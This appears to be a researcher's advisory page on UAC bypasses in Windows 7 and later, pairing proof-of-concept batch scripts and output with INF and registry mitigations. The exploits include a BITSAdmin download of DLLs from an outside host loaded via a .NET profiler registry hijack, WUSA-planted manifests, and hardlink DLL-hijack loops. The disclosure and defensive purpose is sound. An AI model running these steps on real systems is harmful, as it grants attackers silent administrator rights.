Me, myself & IT

Mitigate some Exploits for Windows’^™ UAC

Purpose

Background Information

Reason

Details

Auto-elevating Applications

Vulnerabilities

Vulnerabilities of CompMgmtLauncher.exe

Vulnerability of EventVwr.exe

Vulnerability of MMC.exe

Vulnerability of MMC.exe

Vulnerability of Shortcuts in the Start Menu

Blended Vulnerabilities

Proof of Concept

Blended Vulnerabilities (Continued)

Blended Vulnerabilities (Finished)

Compound Vulnerabilities

MSRC Case 39303

MSRC Case 64957

Mitigations

Mitigation against Exploitation of CompMgmtLauncher.exe

Mitigation against Exploitation of EventVwr.exe

Mitigations against Exploitation of .NET Framework Profiler

Mitigations against Exploitation of HTML Help

Mitigations against Exploitation of Vulnerable Shortcuts in the Start Menu

Mitigation against Exploitation of WUSA.exe

Mitigation against Exploitation of MSHTA.exe, CScript.exe and WScript.exe

Mitigations against Exploitation of Compound Vulnerabilities

Alternative Mitigation

Installation

Update

Deinstallation

Trivia

Purpose

Note: qUACkery is another adequate name for this abomination!

Reason

The TechNet article What's New in User Account Control states for example:

Because UAC requires an administrator to approve application installations, unauthorized applications cannot be installed automatically or without the explicit consent of an administrator.

Also see Mark Russinovich’s TechNet magazine articles Inside Windows Vista User Account Control and Inside Windows 7 User Account Control.

Background Information

User Account Protection was the preliminary name for a core security component of Windows Vista. The component has now been officially named User Account Control (UAC).

This made some (really: a minority of) users quite angry: although these (rather braindead) users continued to abuse the (privileged) protected administrator account created during Windows Setup for their daily work (instead to follow best practise and use an unprivileged limited alias standard user account), they had to answer a prompt whenever they wanted to perform an administrative task.
Unfortunately Microsoft heard these users and weakened the security feature: Windows 7 introduced auto-elevation and enabled it for some 55 programs shipped with Windows 7 and later versions, which don’t prompt for consent any more.

Due to flaws in the design and deficiencies in the implementation of User Account Control, it can be bypassed trivially in numerous ways with its auto-elevation (mis)feature enabled. As result, arbitrary programs can then be run with administrative privileges and access rights without prompting the user for consent.
To defeat some of these trivial bypasses, auto-elevation must be disabled by moving the slider of the User Account Control setting to its highest position titled Always notify, as documented and shown in the MSKB articles 975787 and 4462938.

Details

• have the autoElevate property set in their (embedded) Application Manifest,
• are digitally signed by Microsoft with the Windows Publisher code signing certificate, and
• are stored in secure alias trusted locations like %SystemRoot%\ and its subdirectories.

Auto-elevating Applications

Windows 7 SP1, x64 alias AMD64 Processor Architecture

Windows 10 2004 and Windows 10 20H2, x64 alias AMD64 Processor Architecture

Vulnerabilities

Note: only vulnerabilities and exploits for which a mitigation exists are presented here, together with their mitigation!

Vulnerabilities of CompMgmtLauncher.exe

Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\CompMgmt.msc" launches Computer Management directly, and MMC.exe has auto-elevation enabled too.

CompMgmtLauncher.exe has a major design flaw: instead of launching the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\CompMgmt.msc" it launches the shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk alias %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk.

An unprivileged user can set the environment variable ALLUSERSPROFILE to the pathname of an arbitrary directory under his control, create the subdirectory Microsoft\Windows\Start Menu\Programs\Administrative Tools\ there and then create the shortcut Computer Management.lnk specifying an arbitrary (rogue) command line in this subdirectory.
In standard installations of Windows 7 and newer versions of Windows NT, CompMgmtLauncher.exe launches this command line without UAC prompt with administrative privileges and access rights.

Note: because the command line %SystemRoot%\System32\CompMgmt.msc of the shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk specifies no executable file, CompMgmtLauncher.exe exhibits the (following) vulnerability of EventVwr.exe too.

Vulnerability of EventVwr.exe

Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\EventVwr.msc" launches Event Viewer directly, and MMC.exe has auto-elevation enabled too.

Note: EventVwr.exe exists for backward compatibility with Windows NT4 and earlier versions of Windows NT only; in Windows 2000 the standalone Event Viewer application was replaced by the snap-in EventVwr.msc.

EventVwr.exe has a major design flaw: instead of launching the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\EventVwr.msc" it calls the Win32 function ShellExecute() to launch EventVwr.msc; to evaluate the command line to execute, ShellExecute() reads the (unnamed) default values of the Registry keys HKEY_CLASSES_ROOT\.msc and HKEY_CLASSES_ROOT\mscfile\Shell\Open\Command.

The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry branch HKEY_LOCAL_MACHINE\SOFTWARE\Classes with the Registry branch HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.

An unprivileged user can create the Registry key HKEY_CURRENT_USER\Software\Classes\mscfile\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value, or create the Registry key HKEY_CURRENT_USER\Software\Classes\.msc and write an arbitrary (rogue) Programmatic Identifier (uacamole for example) to its (unnamed) default value, then create the Registry key HKEY_CURRENT_USER\Software\Classes\uacamole\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value.

In standard installations of Windows 7 and newer versions of Windows NT, EventVwr.exe launches this command line without UAC prompt with administrative privileges and access rights.

Vulnerability of MMC.exe

When .NET Framework is loaded, its Common Language Runtime execution engine evaluates the environment variables COR_ENABLE_PROFILING and COR_PROFILER, since .NET Framework 4 additionally COR_PROFILER_PATH, and loads the COM object specified by them as Code Profiler:

When both environment variable checks pass, the CLR creates an instance of the profiler in a similar manner to the COM CoCreateInstance function. The profiler is not loaded through a direct call to CoCreateInstance. Therefore, a call to CoInitialize, which requires setting the threading model, is avoided.

The Component Object Model (COM) leverages the registry to maintain information about all of the COM objects installed on a computer. This registry hive (HKEY_CLASSES_ROOT) is a virtual registry hive, which allows for both per-user and per-machine object registration. Per-user COM objects configurations are stored in HKEY_CURRENT_USER\Software\Classes, while per-machine configurations are stored in HKEY_LOCAL_MACHINE\Software\Classes. Typically, per-user configurations take precedence.

Beginning with Windows Vista® and Windows Server® 2008, if the integrity level of a process is higher than Medium, the COM runtime ignores per-user COM configuration and accesses only per-machine COM configuration. This action reduces the surface area for elevation of privilege attacks, preventing a process with standard user privileges from configuring a COM object with arbitrary code and having this code called from an elevated process.

In standard installations of Windows 7 and newer versions of Windows NT, MMC.exe loads this DLL without UAC prompt with administrative privileges and access rights.

Note: this vulnerability allows arbitrary code execution in every application which uses .NET Framework!

Start the Command Processor under the user protected administrator account created during Windows Setup and run the following (block of) command lines:

REM Copyright © 2017-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER UACaMole /DOWNLOAD /PRIORITY FOREGROUND https://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:*.DLL "%TMP%"
SET COR_ENABLE_PROFILING=1
SET COR_PROFILER={32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
REM SET COR_PROFILER_PATH=%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL
IF NOT "%PROCESSOR_ARCHITECTURE%" == "x86" (
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /V ThreadingModel /T REG_SZ /D Apartment /F
) ELSE (
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
)
START EventVwr.msc

Vulnerability of MMC.exe

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author]
"Location"="‹path›\\‹filename›.‹extension›"

Note: this undocumented feature allows arbitrary code execution in every application which uses HTML Help!

Vulnerability of Shortcuts in the Start Menu

Blended Vulnerabilities

MMC.exe

The Event Viewer snap-in EventVwr.msc of the Microsoft Management Console MMC.exe loads and executes ELS.dll, which in turn loads and executes ELSExt.dll; because ELSExt.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in the system directory %SystemRoot%\System32\, from where it is then loaded and executed with administrative privileges and access rights.

CliConfg.exe

The SQL Client Configuration Utility CliConfg.exe has auto-elevation enabled too.
It loads and executes NTWDBLib.dll; because NTWDBLib.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in the system directory %SystemRoot%\System32\, from where it is then loaded and executed with administrative privileges and access rights.

SysPrep.exe

The System Preparation Utility SysPrep.exe has auto-elevation enabled too.
In Windows 7 and Windows Server 2008 R2, it loads and executes CryptBase.dll, CryptSP.dll, DWMAPI.dll, RPCRtRemote.dll and UXTheme.dll; because these DLLs don’t exist in its application directory %SystemRoot%\System32\SysPrep\, arbitrary (rogue) DLLs with these filenames can be planted there, from where they are then loaded and executed with administrative privileges and access rights.

SetupSQM.exe

The Setup SQM Tool SetupSQM.exe has auto-elevation enabled too.
It loads and executes WDSCore.dll; because WDSCore.dll does not exist in its application directory %SystemRoot%\System32\OoBE\, an arbitrary (rogue) DLL with this filename can be planted there, from where it is then loaded and executed with administrative privileges and access rights.

MCX2Prov.exe

The MCX2 Provisioning Library MCX2Prov.exe has auto-elevation enabled too.
In Windows 7 it loads and executes CryptBase.dll; because CryptBase.dll does not exist in its application directory %SystemRoot%\eHome\, an arbitrary (rogue) DLL with this filename can be planted there, from where it is then loaded and executed with administrative privileges and access rights.

PkgMgr.exe

The Windows Package Manager PkgMgr.exe has auto-elevation enabled too.
It calls DISMHost.exe to perform some of its tasks, which loads and executes PEProvider.dll; because PEProvider.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in its application directory %SystemRoot%\System32\DISM\, from where it is then loaded and executed with administrative privileges and access rights.

MSHTA.exe, CScript.exe and WScript.exe

In Windows 7 and Windows Server 2008 R2, the applications Microsoft HTML Application Host MSHTA.exe, Console Based Script Host CScript.exe and Windows Based Script Host WScript.exe are shipped without embedded Application Manifest.
Windows’ module loader therefore evaluates external (rogue) application manifests MSHTA.exe.manifest, CScript.exe.manifest and WScript.exe.manifest planted in the system directory %SystemRoot%\System32\. These application manifests can enable auto-elevation, resulting in execution of every HTML Application *.hta, every JScript *.js or *.jse, every VBScript *.vbs or *.vbe, as well as every other script *.wsf or *.wsh for the Windows Script Host with administrative privileges and access rights.

Proof of Concept

1. Logon to the UAC-controlled user account created during the setup of Windows 7 and start the Command Processor Cmd.exe unelevated.

2. Create the text file UACAMOLE.XML with the following content in your TMP directory:

   <?xml version='1.0' encoding='UTF-8' standalone='yes' ?>
   <assembly manifestVersion='1.0' xmlns='urn:schemas-microsoft-com:asm.v1'>
       <application xmlns='urn:schemas-microsoft-com:asm.v3'>
           <windowsSettings xmlns='http://schemas.microsoft.com/SMI/2005/WindowsSettings'>
               <autoElevate>true</autoElevate>
           </windowsSettings>
       </application>
       <compatibility xmlns='urn:schemas-microsoft-com:compatibility.v1'>
           <application>
               <supportedOS Id='{35138b9a-5d96-4fbd-8e2d-a2440225f93a}' />
           </application>
       <trustInfo xmlns='urn:schemas-microsoft-com:asm.v2'>
           <security>
               <requestedPrivileges>
                   <requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
               </requestedPrivileges>
           </security>
       </trustInfo>
   </assembly>

3. Create the text file UACAMOLE.DDF with the following content in your TMP directory:

   UACAMOLE.XML CScript.exe.manifest
   UACAMOLE.XML MSHTA.exe.manifest
   UACAMOLE.XML WScript.exe.manifest

4. Run the following command line to create the cabinet file UACAMOLE.CAB in your TMP directory:

   MAKECAB.EXE /D CabinetNameTemplate=UACAMOLE.CAB /F DiskDirectoryTemplate="%TMP%" /D InfFileName=NUL: /D RptFileName=NUL: /F "%TMP%\UACAMOLE.DDF"

5. Run the following command line to extract the cabinet file UACAMOLE.CAB into the system directory %SystemRoot%\System32\:

   WUSA.EXE UACAMOLE.CAB /EXTRACT:"%SystemRoot%\System32"

6. Verify that the application manifest files CScript.exe.manifest, MSHTA.exe.manifest and WScript.exe.manifest have been created in the system directory %SystemRoot%\System32\:

   DIR "%SystemRoot%\System32\*.exe.manifest"

    Volume in drive C has no label.
    Volume Serial Number is 1957-0427
   
    Directory of C:\Windows\System32
   
   04/27/2011  08:15 PM               859 CScript.exe.manifest
   04/27/2011  08:15 PM               859 MSHTA.exe.manifest
   04/27/2011  08:15 PM               859 WScript.exe.manifest
                  3 File(s)           2577 bytes
                  0 Dir(s)    9,876,543,210 bytes free

7. Create the text file UACAMOLE.HTA with the following content in your TMP directory, then execute it per double-click and close its window:

   <HTML>
       <HEAD>
           <HTA:APPLICATION />
           <SCRIPT LANGUAGE="VBScript" TYPE="text/vbscript">
               With CreateObject("Scripting.FileSystemObject")
                   .DeleteFile .BuildPath(.GetSpecialFolder(1), "MSHTA.exe.manifest")
               End With
           </SCRIPT>
       </HEAD>
   </HTML>

   Introduction to HTML Applications (HTAs) HTML Applications Reference HTA:APPLICATION Element | HTA:APPLICATION Object

8. Create the text file UACAMOLE.JS with the following content in your TMP directory:

   new ActiveXObject('Scripting.FileSystemObject').DeleteFile(WScript.FullName + '.manifest');

9. Run the following command line to execute the JScript file %TMP%\UACAMOLE.JS created in step 8. with the Console Based Script Host CScript.exe:

   CSCRIPT.EXE "%TMP%\UACAMOLE.JS"

   Microsoft (R) Windows Script Host, Version 5.8
   Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.

10. Create the text file UACAMOLE.VBS with the following content in your TMP directory and execute it per double-click:

    WScript.CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.FullName & ".manifest")

11. Verify that the application manifest files CScript.exe.manifest, MSHTA.exe.manifest and WScript.exe.manifest have been erased from the system directory %SystemRoot%\System32\, i.e. that the Console Based Script Host CScript.exe, the Microsoft HTML Application Host MSHTA.exe and the Windows Based Script Host WScript.exe ran auto-elevated with administrative privileges and access rights:

    DIR "%SystemRoot%\System32\*.exe.manifest"

     Volume in drive C has no label.
     Volume Serial Number is 1957-0427
    
     Directory of C:\Windows\System32
    
    File Not Found

12. Finally cleanup and exit the Command Processor:

    ERASE "%TMP%\UACAMOLE.*"
    EXIT

Blended Vulnerabilities (Continued)

When searching the PATH for a DLL, Windows’ module loader skips DLLs built for execution environments other than that of the running process. An unprivileged user can build the missing DLLs and place them in an arbitrary directory of the search path, for example the directory %LOCALAPPDATA%\Microsoft\WindowsApps\ alias %USERPROFILE%\AppData\Local\Microsoft\WindowsApps\ introduced with Windows 8.

Note: the (tail of the) search path is controlled by the unprivileged user who can append arbitrary directory names to the user environment variable PATH!

In standard installations of Windows 7 and newer versions of Windows NT, MSDT.exe loads and executes these DLLs indirect via SDiagNHost.exe without UAC prompt with administrative privileges and access rights.

Note: this bypass was also found independent and published as MSDT DLL Hijack UAC bypass.

Blended Vulnerabilities (Finished)

ShellExecute() reads the (unnamed) default value of the Registry key HKEY_CLASSES_ROOT\Folder\Shell\Open\Command and executes the command line found there.

The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry branches HKEY_LOCAL_MACHINE\SOFTWARE\Classes and HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.

An unprivileged user can create the Registry key HKEY_CURRENT_USER\Software\Classes\Folder\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value.

In standard installations of Windows 8 and newer versions of Windows NT, SDCLT.exe launches this command line indirect via Control.exe without UAC prompt with administrative privileges and access rights.

Note: this bypass was also found independent and published as Yet another sdclt UAC bypass.

Compound Vulnerabilities

Due to this gross incompetence and negligence, almost all applications shipped with Windows are vulnerable to the well-known and well-documented CWE-426: Untrusted Search Path as well as CWE-427: Uncontrolled Search Path Element, and susceptible to the well-known and well-documented CAPEC-471: Search Order Hijacking.

Several directories below %SystemRoot%\, for example %SystemRoot%\System32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ and %SystemRoot%\System32\Microsoft\Crypto\RSA\MachineKeys\, are writable by unprivileged users, who can copy one of the about 63 (vulnerable) applications which have the auto-elevation (mis)feature enabled next to any (rogue) DLLs they load into these directories and execute them there to exploit this vulnerability and run arbitrary code provided in the DLLs with administrative privileges and access rights!

Start the Command Processor with delayed (environment variable) expansion enabled under the user protected administrator account created during Windows Setup and run the following (blocks of) command lines:

REM Copyright © 2011-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

TITLE Step 1: NetPlWiz.exe shows a (yellow) UAC prompt when run from an untrusted directory
COPY /Y "%SystemRoot%\System32\NetPlWiz.exe" "%ProgramData%\NetPlWiz.exe"
START "Oops!" /WAIT /B "%ProgramData%\NetPlWiz.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%

TITLE Step 2: NetPlWiz.exe loads an arbitrary NetPlWiz.dll from its application directory
COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%ProgramData%\NetPlWiz.dll"
START "Ouch!" /WAIT /B "%ProgramData%\NetPlWiz.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%

TITLE Step 3: NetPlWiz.exe auto-elevates and loads an arbitrary NetPlWiz.dll
COPY /Y NUL: "%ProgramData%\NetPlWiz.log"
DIR "%SystemRoot%" /A:D /B /S 1>"%ProgramData%\NetPlWiz.tmp"
FOR /F "Delims= UseBackQ" %? IN ("%ProgramData%\NetPlWiz.tmp") DO @(
MKLINK /H "%~?\NetPlWiz.exe" "%ProgramData%\NetPlWiz.exe" 2>NUL: && (
MKLINK /H "%~?\NetPlWiz.dll" "%ProgramData%\NetPlWiz.dll"
START "BOOM?" /WAIT /B "%~?\NetPlWiz.exe"
ECHO !ERRORLEVEL! %~? 1>>"%ProgramData%\NetPlWiz.log"
ERASE "%~?\NetPlWiz.dll"
ERASE "%~?\NetPlWiz.exe"))

TITLE Step 4: display collected error levels and path names
TYPE "%ProgramData%\NetPlWiz.log"

TITLE Step 5: cleanup
ERASE "%ProgramData%\NetPlWiz.dll"
ERASE "%ProgramData%\NetPlWiz.exe"
ERASE "%ProgramData%\NetPlWiz.log"
ERASE "%ProgramData%\NetPlWiz.tmp"

        1 file(s) copied.
0x0 (WIN32: 0 ERROR_SUCCESS) -- 0 (0)
Error message text: The operation completed successfully.
CertUtil: -error command completed successfully.
        1 file(s) copied.
0xc0000139 (NT: 0xc0000139 STATUS_ENTRYPOINT_NOT_FOUND) -- 3221225785 (-1073741511)
Error message text: {Entry Point Not Found}
The procedure entry point %hs could not be located in the dynamic link library %hs.
CertUtil: -error command completed successfully.
Hardlink created for C:\Windows\Tasks\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
Hardlink created for C:\Windows\Tasks\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
[…]
Hardlink created for C:\Windows\Temp\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
Hardlink created for C:\Windows\Temp\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
Could Not Find C:\Windows\Temp\NetPlWiz.dll
Could Not Find C:\Windows\Temp\NetPlWiz.exe
[…]

REM Copyright © 2011-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

TITLE Step 1: PrintUI.exe shows a (yellow) UAC prompt when run from an untrusted directory
COPY /Y "%SystemRoot%\System32\PrintUI.exe" "%PUBLIC%\PrintUI.exe"
START "Oops!" /WAIT /B "%PUBLIC%\PrintUI.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%

TITLE Step 2: PrintUI.exe loads an arbitrary PrintUI.dll from its application directory
COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%PUBLIC%\PrintUI.dll"
START "Ouch!" /WAIT /B "%PUBLIC%\PrintUI.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%

TITLE Step 3: PrintUI.exe auto-elevates and loads an arbitrary PrintUI.dll
COPY /Y NUL: "%PUBLIC%\PrintUI.log"
DIR "%SystemRoot%" /A:D /B /S 1>"%PUBLIC%\PrintUI.tmp"
FOR /F "Delims= UseBackQ" %? IN ("%PUBLIC%\PrintUI.tmp") DO @(
MKLINK /H "%~?\PrintUI.exe" "%PUBLIC%\PrintUI.exe" 2>NUL: && (
MKLINK /H "%~?\PrintUI.dll" "%PUBLIC%\PrintUI.dll"
START "BOOM?" /WAIT /B "%~?\PrintUI.exe"
ECHO !ERRORLEVEL! %~? 1>>"%PUBLIC%\PrintUI.log"
ERASE "%~?\PrintUI.dll"
ERASE "%~?\PrintUI.exe"))

TITLE Step 4: display collected error levels and path names
TYPE "%PUBLIC%\PrintUI.log"

TITLE Step 5: cleanup
ERASE "%PUBLIC%\PrintUI.dll"
ERASE "%PUBLIC%\PrintUI.exe"
ERASE "%PUBLIC%\PrintUI.log"
ERASE "%PUBLIC%\PrintUI.tmp"

        1 file(s) copied.
The operation completed successfully.
        1 file(s) copied.
A dynamic link library (DLL) initialization routine failed.
Hardlink created for C:\Windows\Tasks\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
Hardlink created for C:\Windows\Tasks\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
[…]
Hardlink created for C:\Windows\Temp\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
Hardlink created for C:\Windows\Temp\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
Could Not Find C:\Windows\Temp\PrintUI.dll
Could Not Find C:\Windows\Temp\PrintUI.exe
[…]

REM Copyright © 2011-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

IF /I NOT "%SystemDrive%" == "%~d0" EXIT /B

COPY "%SystemRoot%\System32\%~n0.exe" "%~dpn0.exe"
IF ERRORLEVEL 1 EXIT /B

"%~dpn0.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%

COPY "%SystemRoot%\System32\ShUnimpl.dll" "%~dpn0.dll"
IF ERRORLEVEL 1 EXIT /B

"%~dpn0.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%

COPY NUL: "%~dpn0.log"
IF ERRORLEVEL 1 EXIT /B

"%SystemRoot%\System32\Mode.com" CON: LINES=9999
DIR "%ProgramData%" /A:D /B 1>"%~dpn0.tmp"
DIR "%ProgramFiles%" /A:D /B /S 1>>"%~dpn0.tmp"
IF DEFINED ProgramFiles(x86) IF NOT "%ProgramFiles(x86)%" == "%ProgramFiles%" (
DIR "%ProgramFiles(x86)%" /A:D /B /S 1>>"%~dpn0.tmp")
DIR "%SystemRoot%" /A:D /B /S 1>>"%~dpn0.tmp"
SETLOCAL ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
FOR /F "Delims= UseBackQ" %%? IN ("%~dpn0.tmp") DO @(
MKLINK /H "%%~?\%~n0.exe" "%~dpn0.exe" 2>NUL: && (
MKLINK /H "%%~?\%~n0.dll" "%~dpn0.dll"
"%%~?\%~n0.exe"
ECHO !ERRORLEVEL! %%~? 1>>"%~dpn0.log"
ERASE "%%~?\%~n0.dll"
ERASE "%%~?\%~n0.exe"))
ERASE "%~dpn0.dll"
ERASE "%~dpn0.exe"
ERASE "%~dpn0.tmp"
EXIT /B

MSRC Case 39303

They replied with the following statement:

UAC is not a security boundary. As such, this does not meet the bar for an explicit down level fix.

Note: User Account Control was but announced and introduced as core security component:

User Account Protection was the preliminary name for a core security component of Windows Vista. The component has now been officially named User Account Control (UAC).

MSRC Case 64957

They replied with the following statement:

Thank you again for your research and report. Our analyst has completed their review of your report regarding color coded UAC prompts. We were able to reproduce the issue as you reported it, but this issue would not meet our bar for immediate servicing with a Patch Tuesday security update. Issues involving UAC typically do not meet the bar per our servicing criteria published here - https://aka.ms/windowscriteria, as we don't consider UAC a hard security boundary, but rather, a customizable enhancement to assist in making security accessible to all users from home consumers to enterprise customers.

I will be closing this case, but we have notified the UAC team, and this is something that they may consider for a future release of Windows. We appreciate the opportunity to review your research, and please don't hesitate to send us any additional findings at https://aka.ms/secure-at.

What’s the worth of a core security component that can simply be bypassed by granting unprivileged users write permission in directories beyond the system directory due to careless and clueless implementation of the applications that depend on it?
What about defense in depth or trustworthy computing?

Mitigations

Note: the mitigations are designed for and have been tested on Windows 7; their adaption to newer versions of Windows NT is left as an exercise to the reader.

Mitigation against Exploitation of CompMgmtLauncher.exe

; Copyright © 2016-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKCR,"CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"
HKCR,"Launcher.Computer\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"

HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CompMgmtLauncher.exe",2,"RunAsInvoker"

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Note: always specify complete command lines in Registry entries, not just the name of a data or script file, and always use fully qualified pathnames!

Mitigation against Exploitation of EventVwr.exe

; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKCR,"evtfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""
HKCR,"evtxfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""

HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\EventVwr.exe",2,"RunAsInvoker"

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Note: always specify complete command lines in Registry entries, not just the name of a data or script file, and always use fully qualified pathnames!

Mitigations against Exploitation of .NET Framework Profiler

Additionally use AppLocker or Software Restriction Policies alias SAFER. to deny execution of DLLs from user-writable directories.

Mitigations against Exploitation of HTML Help

Additionally use AppLocker or Software Restriction Policies alias SAFER. to deny execution of DLLs from user-writable directories.

Mitigations against Exploitation of Vulnerable Shortcuts in the Start Menu

; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
ProfileItems = Shortcut

[Shortcut]
CmdLine     = 16421,,"MMC.exe %16421%\TaskSchd.msc"
;HotKey     =
IconIndex   = 1
IconPath    = 16421,,"MIGUIResource.dll"
InfoTip     = "@%16421%\MIGUIResource.dll,-202"
Name        = "Task Scheduler",0
SubDir      = "Accessories\System Tools"
;WorkingDir = 16421,

Note: always specify complete command lines in shortcuts, not just the name of a data or script file, and always use fully qualified pathnames!

Mitigation against Exploitation of WUSA.exe

; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WUSA.exe",2,"RunAsInvoker"

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Mitigation against Exploitation of MSHTA.exe, CScript.exe and WScript.exe

; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\MSHTA.exe",2,"RunAsInvoker"
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CScript.exe",2,"RunAsInvoker"
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WScript.exe",2,"RunAsInvoker"

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Mitigations against Compound Vulnerabilities

Set the UAC slider to its highest position titled Always notify:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000002
;"ConsentPromptBehaviorUser"=dword:00000000

